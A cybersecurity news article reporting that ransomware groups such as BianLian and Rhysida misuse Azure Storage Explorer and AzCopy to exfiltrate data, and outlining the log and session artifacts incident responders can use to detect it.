Ransomware Gangs Exploit Azure Storage Explorer to Steal Sensitive Data

Recent investigations have revealed that ransomware groups like BianLian and Rhysida are using Azure Storage Explorer to steal sensitive data, whch originally designed for managing Azure storage, is now being repurposed for large-scale data transfers to cloud storage. 

The tactic has become increasingly common in ransomware attacks over the past five years, highlighting the need for incident responders to understand the forensic evidence left by Azure Storage Explorer and AzCopy. 

By recognizing these emerging threats, organizations can improve their incident response capabilities and better protect their critical data from sophisticated exfiltration strategies.

Ransomware attacks have evolved to include data exfiltration as a standard tactic, offering threat actors increased leverage during negotiations. Tools like MEGAsync and Rclone are commonly used for large-scale data exfiltration, and Windows Shellbags provide investigators with clues about their movements. 

While threat actors exfiltrate significant amounts of data, they prioritize valuable and protected information to maximize their impact.

Microsoft Azure Storage Explorer

Azure Storage Explorer, a graphical tool for managing Azure storage resources, has been used by ransomware groups like BianLian and Rhysida for data exfiltration. 

The tool utilizes AzCopy, a command-line utility, to transfer files to Azure Blob Storage. Threat actors often install Azure Storage Explorer on compromised systems and upgrade .NET to ensure compatibility. 

The tool’s default installation locations are %USERPROFILE%\AppData\Local\Programs\Microsoft Azure Storage Explorer and C:\Program Files\Microsoft Azure Storage Explorer. 

BianLian has been observed using Azure Storage Explorer to upload large volumes of files to blob containers, exploiting its scalability and the reduced likelihood of outbound connection blocking.

Azure Blob

Azure Blob Storage organizes data into a hierarchical structure. A storage account serves as the top-level container for the data. Within a storage account, containers are created to logically group related blobs. 

Blobs are the individual data objects stored within containers, which allows for efficient organization and management of data within the Azure cloud platform.

The default INFO logging level in Azure Storage Explorer and AzCopy instances can be a valuable asset for incident responders, which provide detailed information about file transfers, including successful uploads, downloads, and copies. 

By analyzing these logs, investigators can identify potential data exfiltration activities, such as unauthorized file uploads or downloads. Additionally, the logs can reveal other malicious activities, like the importation of toolkits or malicious programs. 

Default setting for Logout on Exit

According to Mode Push, it is important to note that Azure Storage Explorer retains valid Azure Storage sessions even when the application is closed, which could enable unauthorized access to data.

As ransomware tactics shift towards data exfiltration, incident responders must adapt. ModePUSH’s discovery of Azure Storage Explorer as a data exfiltration tool emphasizes the need for close scrutiny of compromised systems. 

By staying updated on emerging threats and using available forensic artifacts, investigators can improve their ability to defend against, investigate, and ultimately protect critical data from these advanced attacks. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here